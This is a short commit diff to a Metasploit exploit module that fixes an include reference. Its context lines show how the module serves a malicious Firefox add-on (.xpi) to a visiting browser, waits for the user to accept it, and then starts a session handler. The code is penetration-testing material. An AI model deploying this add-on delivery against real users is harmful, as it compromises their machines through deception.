Fix include reference.

bug/bundler_fix
Joe Vennix 2013-12-18 20:35:43 -06:00
parent f411313505
commit 23b5254ea1
1 changed files with 1 additions and 2 deletions

View File

@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::Browser::FirefoxAddonGenerator
include Msf::Exploit::Remote::FirefoxAddonGenerator
def initialize( info = {} )
super( update_info( info,
@ -63,7 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
print_status("Sending xpi and waiting for user to click 'accept'...")
send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
handler( cli )